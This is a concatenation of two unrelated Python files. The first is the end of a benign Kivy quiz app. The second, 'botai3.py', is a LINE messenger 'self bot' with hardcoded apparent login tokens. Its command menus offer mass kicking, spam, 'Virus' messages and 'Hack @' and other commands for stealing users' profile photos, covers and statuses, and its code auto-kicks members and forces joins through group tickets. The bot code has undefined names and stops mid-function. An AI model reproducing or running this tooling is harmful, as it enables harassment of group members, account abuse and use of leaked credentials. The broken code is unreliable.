Clock.schedule_once(self.update_label, 1)
def check_answer(self, button_pressed):
if button_pressed.text == self.task_values[1]:
button_pressed.background_normal = './data/correct.png'
self.round_number += 1
self.count += 2
self.errors_made = 0
self.ids.label_2.text = "Score :"+str(self.count)
self.ids.label_1.text = "Errors: " + str(self.errors_made)
self.ids.label_3.text = str(self.round_number) + " / " + str(self.max_rounds)
#when answer is wrong it goes to else part
else:
self.round_number += 1
self.ids.label_3.text = str(self.round_number) + " / " + str(self.max_rounds)
self.ids.label_2.text = "Score :"+str(self.count)
self.errors_made += 1
self.ids.label_1.text = "Errors: " + str(self.errors_made)
self.ids.task.markup = True
#it shows incorrect button in red colour
self.ids.task.text = '[color=#ff3333]'+self.task_values[6]+'[/color]'
button_pressed.background_normal = './data/error.png'
if self.round_number == self.max_rounds:
self.manager.current = 'result'
else:
t2 = threading.Thread(target=self.response)
t2.start()
def response(self):
time.sleep(1)#update widgets after specific time
self.ids.button_1.disabled = True
self.ids.button_2.disabled = True
self.ids.button_3.disabled = True
self.ids.button_4.disabled = True
time.sleep(1)
self.ids.button_1.disabled = False
self.ids.button_2.disabled = False
self.ids.button_3.disabled = False
self.ids.button_4.disabled = False
self.set_next_task()
class ResultScreen(Screen):
def calculate_result(self, screen):
if screen.errors_made <= 1:
self.ids.star_5.source = './data/star.png'
self.ids.star_4.source = './data/star.png'
self.ids.star_3.source = './data/star.png'
self.ids.star_2.source = './data/star.png'
self.ids.star_1.source = './data/star.png'
self.ids.label.text = 'Excellent!\n\n'
elif screen.errors_made <= 2:
self.ids.star_4.source = './data/star.png'
self.ids.star_3.source = './data/star.png'
self.ids.star_2.source = './data/star.png'
self.ids.star_1.source = './data/star.png'
self.ids.label.text = 'Very good!\n\n Close to perfect. Keep up!'
elif screen.errors_made <= 4:
self.ids.star_3.source = './data/star.png'
self.ids.star_2.source = './data/star.png'
self.ids.star_1.source = './data/star.png'
self.ids.label.text = 'Good!\n\n Train more!'
elif screen.errors_made <= 6:
self.ids.star_2.source = './data/star.png'
self.ids.star_1.source = './data/star.png'
self.ids.label.text = 'Good!\n\n Train more!'
elif screen.errors_made <= 8:
self.ids.star_1.source = './data/star.png'
self.ids.label.text = 'Good!\n\n Train more!'
else:
self.ids.label.text = 'Okay...\n\n Try again to get all the stars!'
self.ids.label_4.text = "Score:" +str(screen.count)
class PopUpQuit(Popup):
pass
class SignupWindow(Screen):
pass
def invalidLogin():
pop = Popup(title='Invalid Login',
content=Label(text='Invalid username or password.'),
size_hint=(None, None), size=(400, 400))
pop.open()
def invalidForm():
pop = Popup(title='Invalid Form',content=Label(text='Please fill in all inputs with valid information.'),
size_hint=(None, None), size=(400, 400))
pop.open()
db = DataBase("users.txt")
class MainWindow(Screen):
n = ObjectProperty(None)
created = ObjectProperty(None)
email = ObjectProperty(None)
current = ""
def logOut(self):
self.manager.current = "login"
def on_enter(self, *args):
password, name, created = db.get_user(self.current)
self.n.text = "Account Name: " + name
self.email.text = "Email: " + self.current
self.created.text = "Created On: " + created
class MainApp(MDApp):
sm = ScreenManager(transition=FadeTransition())
def build(self):
self.sm.add_widget(SigninWindow(name='login'))
self.sm.add_widget(Menu(name='menu'))
self.sm.add_widget(ActionScreen(name='game'))
self.sm.add_widget(MainWindow(name='main'))
self.sm.add_widget(StartScreen(name='start'))
self.sm.add_widget(NextScreen(name='progress'))
self.sm.add_widget(HelpScreen(name='help'))
self.sm.add_widget(AboutScreen(name='about'))
self.sm.add_widget(ResultScreen(name='result'))
self.sm.add_widget(SignupWindow(name='signup'))
self.sm.add_widget(CreateAccount(name = 'create'))
#Bind to keyboard to make the back button under android work
Window.bind(on_keyboard=self.handle_keyboard)
self.title = 'GenerealKnowledgeQuiz'
return self.sm
def handle_keyboard(self, window, key, *largs):
#keycode 273 equals up button, just for test purposes
if key == 27 or key == 273:
if self.sm.current_screen.name == 'game':
popup = PopUpQuit()
popup.open()
elif self.sm.current_screen.name == 'menu':
quit()
return True
if __name__ == '__main__':
MainApp().run()
|
botai3.py | # -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='EvyRA6uk6WO6OANNneCf.zsjptOGse28bSLj1PuTA7W.69J4S3XwOhfQOzyc/cz+oEZe9uGJfYCWIjHzdfhmM9o=')
cl.loginResult()
print "Cl-Login Success\n"
ki1 = LINETCR.LINE()
#ki1.login(qr=True)
ki1.login(token='Ev69mxc1xsPI0PZv3rR3.ceM9NaolFHDUaV2+G8nZyW.dIMEwUnTtabrS/gHoTpPKbYx6n8OTe3HiHY4S5d8LMM=')
ki1.loginResult()
print "Ki-Login Success\n"
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='EvkhBZPTCc1GtMyB3BV7.L9FHe7uzKTCG1RQIn1TiTW.yAaZhULyuBUQXshDpj0fBDPXGADVV+KBoYvlT5/IPWk=')
ki2.loginResult()
print "Ki2-Login Success\n"
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token='EvkhBZPTCc1GtMyB3BV7.L9FHe7uzKTCG1RQIn1TiTW.yAaZhULyuBUQXshDpj0fBDPXGADVV+KBoYvlT5/IPWk=')
ki3.loginResult()
print "Ki3-Login Success\n"
ki10 = LINETCR.LINE()
#ki10.login(qr=True)
ki10.login(token='EveDBXagKElQaY3wLBT7.zHaODuDXU8bfbqzFy+szXW.NfYuKFYnbskfXDh69vYhjmP3ZDACQuw00qrTCSAHqcE=')
ki10.loginResult()
print "Ki10-Login Success\n"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
╔═════════════════════
║ [SELF BOT]
║ [By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ instruction set 1 ☬]
╚══════════════════
╔═════════════════════
║☬➣『me』
║☬➣『K on/off』
║☬➣『Virus』
║☬➣『ct @』
║☬➣『Key』
║☬➣『Ginfo:』
║☬➣『Mid』
║☬➣『Mid @』
║☬➣『Allmid』
║☬➣『Mc:』
║☬➣『Gift』
║☬➣『kick1 -- kick10 gift』
║☬➣『Cn: 』 naming
║☬➣『naming: 』naming clocks
║☬➣『turn on the clock/Jam on』
║☬➣『turn off the clock』
║☬➣『Group』
║☬➣『Tl: text』
║☬➣『Tx:』 create a virus name
║☬➣『Online check』
║☬➣『open pull back』
║☬➣『closed pull back』
║☬➣『open group』
║☬➣『closed group』
║☬➣『Like on』
║☬➣『Add:on/off』
║☬➣『leave on/off』
║☬➣『Share on』
║☬➣『share off』
║☬➣『Add message: text』
║☬➣『Message:』
║☬➣『comment: 』
║☬➣『com on/off』
║☬➣『com off』
║☬➣ 『time』เช็ค วัน - เวลา
║☬➣『yt 』
║☬➣『ytmp3』
║☬➣『siri:』
║☬➣『Siri-en』
║☬➣『say』
║☬➣『/say』 Kick the speaker
║☬➣ 『/ 』 sticker
║☬➣ 『R chat』REMOVCHAT
║☬➣『rejec』
║☬➣『kick1 -- kick10 rejec』
║☬➣『Log-in / ขอลิ้ง』
║☬➣『rejec invite』
║☬➣『 . 』
║☬➣『notice:』
║☬➣『creator』
║☬➣『Group creator』
║☬➣『Team』
║☬➣『Restart / รีบูต』
║☬➣『muter』
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║ [By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
helpMessage2 ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 2 ☬]
╚══════════════════
╔═════════════════════
║☬➣『mybot』
║☬➣『#mybot』
║☬➣『join』
║☬➣『out』
║☬➣『kick1--10』 kickเกอร์เข้า
║☬➣『kickall』 คำสั่งkickalll
║☬➣『 Nk: 』
║☬➣『Kill』
║☬➣『absen』
║☬➣『Cancel』
║☬➣『Open link』
║☬➣『Close link』
║☬➣『Canncel on/off』
║☬➣『ปิด เชิญ』
║☬➣『เชิญ』
║☬➣『ลิ้ง』
║☬➣『Spam on/off』
║☬➣『Gpict』
║☬➣『pull the picture』
║☬➣『Gurl』
║☬➣『Vps』
║☬➣『เชคค่า』
║☬➣『แทค』
║☬➣『เปิดหมด』
║☬➣『ปิดหมด』
║☬➣『แบน』
║☬➣『ลบแบน』
║☬➣『แบน @』
║☬➣『ลบแบน @』
║☬➣『ล้างดำ』
║☬➣『Cb』
║☬➣『Bl』
║☬➣『สั่งดำ @』
║☬➣『เปิด อ่าน』
║☬➣『ปิด อ่าน』
║☬➣『ลิสกลุ่ม』
║☬➣『Gcancel: 』
║☬➣『Gcancel on/off』
║☬➣『แปลงร่าง @』
║☬➣『mybackup』
║☬➣『kickทั้งหมด @』
║☬➣『kick1- 10 แปลงร่าง @』
║☬➣『kick คืนร่าง』
║☬➣『ตั้งเวลา』
║☬➣『.ใครอ่าน』
║☬➣『เพื่อน』
║☬➣『#เพื่อน』
║☬➣『บล็อค』
║☬➣『เปิด ล็อคชื่อ』
║☬➣『ปิด ล็อคชื่อ』
║☬➣『เปิด ป้องกัน』
║☬➣『ปิดป้องกัน』
║☬➣ 『รูป』 รูปเรา
║☬➣ 『ปก』 รูแปก เรา
║☬➣ 『โปรวีดีโอ』 วีดีโอโปร เรา
║☬➣ 『ตัส』 ตัสเรา
║☬➣ 『ลิ้งรูป』 ลิ้งรูปเรา
║☬➣ 『ลิ้งปก』 ลิ้งปกเรา
║☬➣ 『Hack @』ขโโมย คท + Mid
║☬➣ 『/รูป @』 ขโมย รูป
║☬➣ 『/ปก @』 ขโมย รูปปก
║☬➣ 『/ตัส @』 ขโมย ตัส
║☬➣ 『เชคหมด』เชครูป ปก ตัส
║☬➣『Sk』
║☬➣『Sp』
║☬➣『Bot Speed』
║☬➣『Key』
║☬➣『Qr on/off』
║☬➣『Backup on/off』
║☬➣『Protect On/off』
║☬➣『Namelock On/off』
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║ [By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
helpMessage3 ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 3 ☬]
╚══════════════════
╔═══════════════════
║ ✟ New function ✟
╠═══════════════════
║☬➣〘Protact on/off
║☬➣〘Qr on/off
║☬➣〘Invit on/off〙
║☬➣〘Cancel on/off〙
╚═══════════════════
╔═══════════════════
║ ✟โหมดเรียนเเบบ✟
╠═══════════════════
║☬➣〘Mimic: on/off〙
║☬➣〘Micadd @〙
║☬➣ Micdel @〙
╠═══════════════════
║ ✟ New function ✟
╠═══════════════════
║☬➣〘Contact on/off〙
║☬➣〘Autojoin on/off〙
║☬➣〘Autoleave on/off〙
║☬➣〘Autoadd on/off〙
║☬➣〘Like me〙
║☬➣〘Like friend〙
║☬➣〘Like on〙
║☬➣〘Respon on/off〙
║☬➣〘Read on/off〙
║☬➣〘Simisimi on/off〙
╠══════════════════
║ ✟ New function ✟
╠══════════════════
║☬➣〘Kalender〙
║☬➣〘tr-id 〙
║☬➣〘tr-en 〙
║☬➣〘tr-jp 〙
║☬➣〘tr-ko 〙
║☬➣〘say-id 〙
║☬➣〘say-en 〙
║☬➣〘say-jp 〙
║☬〘say-ko 〙
║☬➣〘profileig 〙
║☬➣〘checkdate 〙
╚══════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║[By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
╔════════════════════
║ ✦เปิด/ปิดข้อความต้อนรับ✦
╠════════════════════
║☬Hhx1 on ➠เปิดต้อนรับ
║☬Hhx1 off ➠ปิดต้อนรับ
║☬Hhx2 on ➠เปิดออกกลุ่ม
║☬Hhx2 off ➠ปิดออกกลุ่ม
║☬Hhx3 on ➠เปิดsayถึงคนลบ
║☬Hhx3 off ➠ปิดsayถึงคนลบ
║☬Mbot on ➠เปิดเเจ้งเตือน
║☬Mbot off ➠ปิดเเจ้งเตือน
║☬M on ➠เปิดเเจ้งเตือนตนเอง
║☬M off ➠ปิดเเจ้งเตือนตนเอง
║☬Tag on ➠เปิดกล่าวถึงเเท็ค
║☬Tag off ➠ปิดกล่าวถึงเเท็ค
║☬Kicktag on ➠เปิดเตะคนเเท็ค
║☬Kicktag off ➠ปิดเตะคนเเท็ค
╚═════════════════════
╔═════════════════════
║ ✦โหมดตั้งค่าข้อความ✦
╠═════════════════════
║☬Hhx1˓: ➠ไส่ข้อความต้อนรับ
║☬Hhx2˓: ➠ไส่ข้อความออกจากกลุ่ม
║☬Hhx3˓: ➠ไส่ข้อความเมื่อมีคนลบ
║☬Tag1: ➠ใส่ข้อความแทค
║☬Tag2: ➠ ใส่ข้อความแทค
╚═════════════════════
╔═════════════════════
║ ✦โหมดเช็คตั้งค่าข้อความ✦
╠═════════════════════
║☬Hhx1 ➠เช็คข้อความต้อนรับ
║☬Hhx2 ➠เช็คข้อความคนออก
║☬Hhx3 ➠เช็คข้อความคนลบ
║☬Tag1 ➠เช็ตข้อความแทค
║☬Tag2 ➠เช็คข้อความแทค
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║[By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
KAC=[cl,ki1,ki2,ki3]
mid = cl.getProfile().mid
Amid1 = ki1.getProfile().mid
Amid2 = ki2.getProfile().mid
Amid3 = ki3.getProfile().mid
#Amid4 = ki4.getProfile().mid
#Amid5 = ki5.getProfile().mid
#Amid6 = ki6.getProfile().mid
#Amid7 = ki7.getProfile().mid
#Amid8 = ki8.getProfile().mid
#Amid9 = ki9.getProfile().mid
Amid10 = ki10.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
mid = cl.getProfile().mid
Bots = ["",mid]
self = ["",mid]
admin = ""
admsa = ""
owner = ""
adminMID = ""
Creator=""
wait = {
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":False,
'pap':{},
'invite':{},
"spam":{},
'contact':True,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"[ตอบรับ อัตโนมัติ]\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\nhttp://line.me/ti/p/arif.mh",
"lang":"JP",
"commentOn":True,
"comment1":"""
[ AOTO LIKE ]
[ SELF BOT ]
[ รับติดตั้ง เชลmybot ราคาประหยัด ]
[By.☬ARIFISTIFIK☬]
http://line.me/ti/p/arif.mh
─██─███─███─██─██─██▄█
─██─▀██▄██▀─▀█▄█▀─██▀█
▄██▄▄█▀▀▀─────▀──▄██▄▄█
[ DRAGON PLAY ]
http://line.me/ti/p/arif.mh
""",
"acommentOn":True,
"bcommentOn":True,
"ccommentOn":True,
"Protectcancl":False,
"pautoJoin":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"likeOn":True,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"ainvite":False,
"binvite":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"Hhx1":False,
"Hhx2":False,
"Hhx3":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":True,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag1":"\n[🔯ยังไม่มีข้อความ ตอบกลับ🔯]",
"tag2":"\n[🔯ยังไม่มีข้อความ ตอบกลับ🔯]",
"posts":True,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki1.getProfile()
backup = ki1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki2.getProfile()
backup = ki2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
#contact = ki3.getProfile()
#backup = ki3.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki4.getProfile()
#backup = ki4.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki5.getProfile()
#backup = ki5.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki6.getProfile()
#backup = ki6.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki7.getProfile()
#backup = ki7.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki8.getProfile()
#backup = ki8.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki9.getProfile()
#backup = ki9.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki10.getProfile()
#backup = ki10.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
contact = ki1.getProfile()
backup = ki1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def sendImageWithUrl(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
day, hours = divmod(hours,24)
return '%02d วัน %02d ชั่วโมง %02d นาที %02d วินาที' % (day,hours, mins, secs)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_, text=None, contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M2 = self._client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImage2(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = cl.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki1.getGroup(op.param1)
except:
try:
G = ki2.getGroup(op.param1)
except:
try:
G = ki3.getGroup(op.param1)
except:
try:
G = ki4.getGroup(op.param1)
except:
try:
G = ki5.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki1.updateGroup(G)
except:
try:
ki2.updateGroup(G)
except:
try:
ki2.updateGroup(G)
except:
try:
ki3.updateGroup(G)
except:
try:
ki4.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
pass
cl.sendText(op.param1,"Group Name Lock")
ki1.sendText(op.param1,"Haddeuh dikunci Pe'a")
ki2.sendText(op.param1,"Wekawekaweka (Har Har)")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid1:
G = ki1.getGroup(op.param1)
G.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid2:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid3:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid4:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid5:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid6:
G = ki6.getGroup(op.param1)
G.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid7:
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid8:
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid9:
G = ki9.getGroup(op.param1)
G.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid10:
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
if op.param3 in Amid1:
if op.param2 in Amid2:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
ki1.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in Amid2:
if op.param2 in Amid3:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in Amid3:
if op.param2 in Amid4:
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
